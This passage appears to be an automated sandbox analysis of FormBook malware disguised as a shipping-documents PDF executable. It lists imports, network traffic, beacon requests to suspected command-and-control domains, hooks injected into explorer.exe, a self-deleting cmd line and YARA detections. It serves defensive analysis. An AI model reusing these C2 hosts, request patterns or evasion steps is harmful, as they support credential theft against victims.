                                      .rsrc0x140000x15d80x2000False0.138793945312data1.78701824308IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountry
                                      RT_ICON0x153f00x1e8data
                                      RT_ICON0x14d280x6c8data
                                      RT_ICON0x143a00x988data
                                      RT_GROUP_ICON0x143700x30data
                                      RT_VERSION0x141500x220dataGreekGreece

                                      Imports

                                      DLLImport
                                      MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaCastObjVar, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaVarDup, __vbaVarLateMemCallLd, __vbaFpI4, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                                      Version Infos

                                      DescriptionData
                                      Translation0x0408 0x04b0
                                      InternalNamefdselskontrol
                                      FileVersion2.00
                                      CompanyNameGallup
                                      ProductNameGallup
                                      ProductVersion2.00
                                      OriginalFilenamefdselskontrol.exe

                                      Possible Origin

                                      Language of compilation systemCountry where language is spokenMap
                                      GreekGreece

                                      Network Behavior

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Nov 20, 2020 08:53:59.745408058 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:53:59.879342079 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:53:59.879503965 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:53:59.893282890 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.027230978 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.029325962 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.029354095 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.029365063 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.029715061 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.108243942 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.242584944 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.242741108 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.255810976 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.394313097 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.394345045 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.394361973 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.394398928 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.394418955 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.394442081 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.394464016 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.394464016 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.394484043 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.394500017 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.394506931 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.394529104 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.394529104 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.394556999 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.394588947 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.528464079 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.528506041 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.528525114 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.528553009 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.528574944 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.528593063 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.528613091 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.528633118 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.528637886 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.528651953 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.528672934 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.528692007 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.528693914 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.528717041 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.528738976 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.528739929 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.528759956 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.528768063 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.528780937 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.528788090 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.528801918 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.528820992 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.528825045 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.528844118 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.528865099 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.528865099 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.528889894 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.528889894 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.528927088 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.528949022 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.662935019 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.662976027 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.662992954 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663016081 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663038015 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663060904 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663081884 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663103104 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663124084 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663146973 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663166046 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663181067 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.663187027 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663208008 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663232088 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663235903 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.663243055 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.663255930 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663275957 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663276911 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.663295031 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.663297892 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663320065 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663340092 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663352966 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.663361073 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663367987 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.663373947 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.663382053 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663398027 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.663407087 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663429022 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663443089 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.663449049 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663470984 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663481951 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.663494110 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663513899 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663522959 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.663535118 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663536072 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.663557053 CET44349699192.185.170.106192.168.2.3

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Nov 20, 2020 08:53:41.036067009 CET4987353192.168.2.38.8.8.8
                                      Nov 20, 2020 08:53:41.071582079 CET53498738.8.8.8192.168.2.3
                                      Nov 20, 2020 08:53:42.716921091 CET5319653192.168.2.38.8.8.8
                                      Nov 20, 2020 08:53:42.744040966 CET53531968.8.8.8192.168.2.3
                                      Nov 20, 2020 08:53:44.888142109 CET5677753192.168.2.38.8.8.8
                                      Nov 20, 2020 08:53:44.923767090 CET53567778.8.8.8192.168.2.3
                                      Nov 20, 2020 08:53:46.453296900 CET5864353192.168.2.38.8.8.8
                                      Nov 20, 2020 08:53:46.480426073 CET53586438.8.8.8192.168.2.3
                                      Nov 20, 2020 08:53:47.579297066 CET6098553192.168.2.38.8.8.8
                                      Nov 20, 2020 08:53:47.609194994 CET53609858.8.8.8192.168.2.3
                                      Nov 20, 2020 08:53:48.411073923 CET5020053192.168.2.38.8.8.8
                                      Nov 20, 2020 08:53:48.438081026 CET53502008.8.8.8192.168.2.3
                                      Nov 20, 2020 08:53:49.291783094 CET5128153192.168.2.38.8.8.8
                                      Nov 20, 2020 08:53:49.318876028 CET53512818.8.8.8192.168.2.3
                                      Nov 20, 2020 08:53:51.135487080 CET4919953192.168.2.38.8.8.8
                                      Nov 20, 2020 08:53:51.162585020 CET53491998.8.8.8192.168.2.3
                                      Nov 20, 2020 08:53:58.944839001 CET5062053192.168.2.38.8.8.8
                                      Nov 20, 2020 08:53:58.971955061 CET53506208.8.8.8192.168.2.3
                                      Nov 20, 2020 08:53:59.697483063 CET6493853192.168.2.38.8.8.8
                                      Nov 20, 2020 08:53:59.732965946 CET53649388.8.8.8192.168.2.3
                                      Nov 20, 2020 08:53:59.744282007 CET6015253192.168.2.38.8.8.8
                                      Nov 20, 2020 08:53:59.771338940 CET53601528.8.8.8192.168.2.3
                                      Nov 20, 2020 08:54:01.299463034 CET5754453192.168.2.38.8.8.8
                                      Nov 20, 2020 08:54:01.336406946 CET53575448.8.8.8192.168.2.3
                                      Nov 20, 2020 08:54:32.659728050 CET5598453192.168.2.38.8.8.8
                                      Nov 20, 2020 08:54:32.686847925 CET53559848.8.8.8192.168.2.3
                                      Nov 20, 2020 08:54:38.349349976 CET6418553192.168.2.38.8.8.8
                                      Nov 20, 2020 08:54:38.376209974 CET53641858.8.8.8192.168.2.3
                                      Nov 20, 2020 08:54:39.226186991 CET6511053192.168.2.38.8.8.8
                                      Nov 20, 2020 08:54:39.253403902 CET53651108.8.8.8192.168.2.3
                                      Nov 20, 2020 08:54:40.286223888 CET5836153192.168.2.38.8.8.8
                                      Nov 20, 2020 08:54:40.313278913 CET53583618.8.8.8192.168.2.3
                                      Nov 20, 2020 08:55:04.128407001 CET6349253192.168.2.38.8.8.8
                                      Nov 20, 2020 08:55:04.268604040 CET53634928.8.8.8192.168.2.3
                                      Nov 20, 2020 08:55:24.721892118 CET6083153192.168.2.38.8.8.8
                                      Nov 20, 2020 08:55:25.058480024 CET53608318.8.8.8192.168.2.3
                                      Nov 20, 2020 08:55:45.905834913 CET6010053192.168.2.38.8.8.8
                                      Nov 20, 2020 08:55:46.033629894 CET53601008.8.8.8192.168.2.3

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                      Nov 20, 2020 08:53:59.697483063 CET192.168.2.38.8.8.80xb712Standard query (0)lifeandhealth.com.mxA (IP address)IN (0x0001)
                                      Nov 20, 2020 08:55:04.128407001 CET192.168.2.38.8.8.80x7ec8Standard query (0)www.drinksandfruits.comA (IP address)IN (0x0001)
                                      Nov 20, 2020 08:55:24.721892118 CET192.168.2.38.8.8.80x62ebStandard query (0)www.iatlet.comA (IP address)IN (0x0001)
                                      Nov 20, 2020 08:55:45.905834913 CET192.168.2.38.8.8.80x733dStandard query (0)www.leepl.comA (IP address)IN (0x0001)

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                      Nov 20, 2020 08:53:59.732965946 CET8.8.8.8192.168.2.30xb712No error (0)lifeandhealth.com.mx192.185.170.106A (IP address)IN (0x0001)
                                      Nov 20, 2020 08:55:04.268604040 CET8.8.8.8192.168.2.30x7ec8No error (0)www.drinksandfruits.comdrinksandfruits.comCNAME (Canonical name)IN (0x0001)
                                      Nov 20, 2020 08:55:04.268604040 CET8.8.8.8192.168.2.30x7ec8No error (0)drinksandfruits.com68.70.163.36A (IP address)IN (0x0001)
                                      Nov 20, 2020 08:55:25.058480024 CET8.8.8.8192.168.2.30x62ebNo error (0)www.iatlet.com156.224.66.93A (IP address)IN (0x0001)
                                      Nov 20, 2020 08:55:46.033629894 CET8.8.8.8192.168.2.30x733dNo error (0)www.leepl.comHDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                      Nov 20, 2020 08:55:46.033629894 CET8.8.8.8192.168.2.30x733dNo error (0)HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com3.223.115.185A (IP address)IN (0x0001)

                                      HTTP Request Dependency Graph

                                      • www.drinksandfruits.com
                                      • www.iatlet.com

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      0192.168.2.34970668.70.163.3680C:\Windows\explorer.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 20, 2020 08:55:04.387131929 CET378OUTGET /icm9/?jJEpd=vVVBlGd6XjiYufiPZCtpE8ClhRDPSp+6pFrvIQJUgNbClm9AeMVCLXFgut4jwu7Jje2C&wZ9=O2MpVr HTTP/1.1
                                      Host: www.drinksandfruits.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Nov 20, 2020 08:55:04.521594048 CET378INHTTP/1.1 404 Not Found
                                      Date: Fri, 20 Nov 2020 07:55:04 GMT
                                      Server: Apache
                                      Content-Length: 315
                                      Connection: close
                                      Content-Type: text/html; charset=iso-8859-1
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      1192.168.2.349707156.224.66.9380C:\Windows\explorer.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 20, 2020 08:55:25.262208939 CET379OUTGET /icm9/?jJEpd=tzd6f6hltsiSnXVk4gBb1fk7WFCRZPV169uDhTo4RpQ3iNZth/6Mcmvn9cuuL1csRrj/&wZ9=O2MpVr HTTP/1.1
                                      Host: www.iatlet.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Nov 20, 2020 08:55:31.869110107 CET380INHTTP/1.1 200 OK
                                      Date: Fri, 20 Nov 2020 07:55:25 GMT
                                      Server: Apache
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                      Pragma: no-cache
                                      Connection: close
                                      Set-Cookie: PHPSESSID=i583v17ri483prc4m1vi8lcsh2; path=/
                                      Upgrade: h2
                                      Connection: Upgrade
                                      Content-Length: 0
                                      Content-Type: text/html; charset=gbk


                                      HTTPS Packets

                                      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                      Nov 20, 2020 08:54:00.029365063 CET192.185.170.106443192.168.2.349699CN=webdisk.lifeandhealth.com.mx CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Fri Nov 06 17:15:38 CET 2020 Thu Mar 17 17:40:46 CET 2016Thu Feb 04 17:15:38 CET 2021 Wed Mar 17 17:40:46 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                      CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Thu Mar 17 17:40:46 CET 2016Wed Mar 17 17:40:46 CET 2021

                                      Code Manipulations

                                      User Modules

                                      Hook Summary

                                      Function NameHook TypeActive in Processes
                                      PeekMessageAINLINEexplorer.exe
                                      PeekMessageWINLINEexplorer.exe
                                      GetMessageWINLINEexplorer.exe
                                      GetMessageAINLINEexplorer.exe

                                      Processes

                                      Process: explorer.exe, Module: user32.dll
                                      Function NameHook TypeNew Data
                                      PeekMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xED
                                      PeekMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xED
                                      GetMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xED
                                      GetMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xED

                                      Statistics

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Start time:08:53:37
                                      Start date:20/11/2020
                                      Path:C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe'
                                      Imagebase:0x7ffb73670000
                                      File size:86016 bytes
                                      MD5 hash:AED402D9A5675F5796265E5170ADA7CB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:Visual Basic
                                      Reputation:low

                                      General

                                      Start time:08:53:48
                                      Start date:20/11/2020
                                      Path:C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe'
                                      Imagebase:0x7ffb73670000
                                      File size:86016 bytes
                                      MD5 hash:AED402D9A5675F5796265E5170ADA7CB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.316144266.000000001E150000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.316144266.000000001E150000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.316144266.000000001E150000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:low

                                      General

                                      Start time:08:54:04
                                      Start date:20/11/2020
                                      Path:C:\Windows\explorer.exe
                                      Wow64 process (32bit):false
                                      Commandline:
                                      Imagebase:0x7ff714890000
                                      File size:3933184 bytes
                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:08:54:18
                                      Start date:20/11/2020
                                      Path:C:\Windows\SysWOW64\wlanext.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\wlanext.exe
                                      Imagebase:0xc90000
                                      File size:78848 bytes
                                      MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000B.00000002.485764868.00000000031ED000.00000004.00000020.sdmp, Author: Florian Roth
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.486000436.0000000003310000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.486000436.0000000003310000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.486000436.0000000003310000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000B.00000002.487639953.0000000003A0F000.00000004.00000001.sdmp, Author: Florian Roth
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.485873650.00000000032E0000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.485873650.00000000032E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.485873650.00000000032E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:moderate

                                      General

                                      Start time:08:54:22
                                      Start date:20/11/2020
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:/c del 'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe'
                                      Imagebase:0xbd0000
                                      File size:232960 bytes
                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:08:54:23
                                      Start date:20/11/2020
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6b2800000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Disassembly

                                      Code Analysis

                                      Reset < >